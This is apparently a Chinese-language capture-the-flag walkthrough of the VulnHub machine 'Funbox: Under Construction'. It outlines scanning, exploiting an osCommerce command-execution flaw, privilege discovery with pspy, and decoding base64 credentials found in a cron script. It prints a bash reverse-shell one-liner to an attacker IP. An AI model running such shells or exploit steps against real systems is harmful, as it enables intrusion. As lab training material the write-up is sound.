环境搭建:

Funbox: Under Construction! ~ VulnHub

漏洞复现:

探测靶机的IP地址

nmap进行探测靶机的服务和端口

 访问80端口

 

 dirb扫描目录,发现catalog目录

 

访问一下,发现是个oscommerce的网站

 

查看版本的漏洞,发现命令执行漏洞 

 

查看该文件,如果执行成功,会返回当前目录的文件

 

修改为靶机的IP

 

运行脚本

 

访问文件,得到回显

 

修改命令

bash -c "exec bash -i &>/dev/tcp/192.168.226.128/1111 <&1" 

 

查看全局变量,查看执行文件都没发现可以利用 

下载pspy64s

wget https://github/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

 

 kali开启python服务,靶机进行下载

修改权限,进行执行

 

发现会执行一个脚本文件

 发现一个base64语句

 

进行解密,发现账号密码

 切换用户登录,要升级shell模式,不然不可以切换用户

 

查看目录下的flag

 

更多推荐

vulnhub Funbox: Under Construction